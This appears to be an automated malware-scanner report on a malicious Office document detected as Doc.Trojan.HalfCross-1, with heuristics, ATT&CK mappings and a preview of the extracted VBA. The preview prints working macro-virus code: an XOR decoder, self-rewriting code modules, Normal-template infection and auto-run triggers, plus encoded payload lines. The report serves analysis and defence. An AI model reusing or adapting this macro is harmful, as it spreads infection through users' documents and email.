MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Office document containing VBA macros, with a high-confidence heuristic indicating a Document_Open macro that executes code. The ClamAV detection name 'Doc.Trojan.HalfCross-1' suggests a known malicious document type. The VBA code appears to be obfuscated but the presence of a Document_Open subroutine indicates an attempt to run malicious code automatically when the document is opened, likely for downloading further stages.
Heuristics 4
-
ClamAV: Doc.Trojan.HalfCross-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.HalfCross-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35025 bytes |
SHA-256: 72348823eee63da0b1d91395a7762001702172f6e829ca39b6792399824dd176 |
|||
|
Detection
ClamAV:
Doc.Trojan.HalfCross-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'
' 35
'ThisDocumentN
Private Sub Workbook_Deactivate()
If ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(40, 1) <> "'InRun" Then Call Calculate_AddressX(98, 25)
End Sub
Private Sub Document_Open()
Call Calculate_Address(83, 15)
End Sub
Private Sub Document_Close()
Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule
With Iam: .ReplaceLine 40, "": Z = .CountOflines: Done = Decode(.Lines(73, 10), 230): .InsertLines Z, Done: Mail_Item: .DeleteLines Z, 10: .ReplaceLine Z, "End Sub": End With
Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Comp2 = Iam.Lines(41, 1): NormalTemplate.Saved = True:
CH = Word.ActiveDocument.Characters.Count: Comp = "'" + Str(CH): t = Iam.Lines(42, 1): If t = "" Then Exit Sub
If Comp = Comp2 And t <> "'ThisDocumentA" Then Iam.ReplaceLine 42, "'ThisDocument" & Right$(t, 1): ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument: Exit Sub
If Comp = Comp2 And t = "'ThisDocumentA" Then ActiveDocument.Saved = True: Exit Sub Else: If t <> "'ThisDocumentA" Then Iam.ReplaceLine 42, "'ThisDocument" & t
End Sub
Private Function Calculate_AddressX(Start_Encode As Integer, Code_Lines As Integer)
Set Work_Book = ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule
With Work_Book: Z = .CountOflines: Done = Decode(.Lines(Start_Encode, Code_Lines), 230): .InsertLines Z, Done: Mail_Item: .DeleteLines Z, Code_Lines: .ReplaceLine Z, "End Sub": End With
End Function
Private Function Calculate_Address(Start_Encode As Integer, Code_Lines As Integer)
On Error Resume Next: CH = Word.ActiveDocument.Characters.Count: Comp = "'" + Str(CH)
WhereAmI = Right$(NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(42, 1), 1)
If WhereAmI = "N" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Iam: Z = .CountOflines: Done = Decode(.Lines(Start_Encode, Code_Lines), 230): .InsertLines Z, Done: Mail_Item: .DeleteLines Z, Code_Lines: .ReplaceLine Z, "End Sub": End With: NormalTemplate.Save
ActiveDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 41, Comp: End Function
Private Function Decode(s, k As Integer)
Dim r: r = "": For F = 1 To Len(s): A = (Mid$(s, F, 1)): If A = Chr(13) Or A = Chr(10) Then r = r + A: GoTo Over
If A = "'" Then A = "": r = r + A: GoTo Over
r = r + Chr((Asc(Mid$(s, F, 1))) Xor k): k = k + 2: If k = 250 Then k = 230
Over: Next F: Decode = r
End Function
'©†Ê©œ‚�†Öªƒ›Ÿ�‹Ð¼‘ŽŒÜȹ‰šÐŠ˜·ˆ–È×Ì‚—•‚�©Š€‰�„ÚÖ³€…�†Â¯€‚˜Ÿ›‡œƒƒ€ÒÛ
'½�س«‹Ÿ‹Ø¶�„О„«œžÞ³„†”�‹‹˜‡ŸœÚ¥Œ‡šž™ž “€žØÍÈÈ°¬Ÿ�ŸÇÖÄÁÃÌÒÎÒ¡µ™•�Âά¿½¿ÇÚÏȾ„‹ž
'¡�…Œƒ…ļœ™„•‚�¶š…Š‡œ—§‚Š�†�ÄÌÒÞÔÔ°³³¥ ¦³¶²·¿¿«¢®§™ž’Ÿ‹ž‹¬¿�•Š‰›…Šš¬½’�‘…�¶ÔÀÀ®±Ž›ƒ„¶¡‡“€›…—€œÊ©–“—˜ÔÔÆÊ¥œš™�š…ÎÄÁÊÑÎÒÐ
'§�‹’�‡Â¾‚›‚—Œƒ¸˜ƒˆ™ž‘¥Œ”�„‹ÆÒÐØÖÚ®£¯µ±¼½··´¹¥«¯¦¹¼±ª«‰Žž›�‚—¨»‘…š…Ÿ�–†¨¹ž€�‰‰²ÈÜĪ¶ƒŸÊ¹�•€Ô¥�’œƒ‚‰ƒ®±Ž›ƒ„¶¡‡“€›…—€œÊ©–“—˜ÔÔÆÊ¥œš™�š…ÎÄÁÊÑÎÒÐ
'Œš¹–˜Ä»�‚™–™—
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.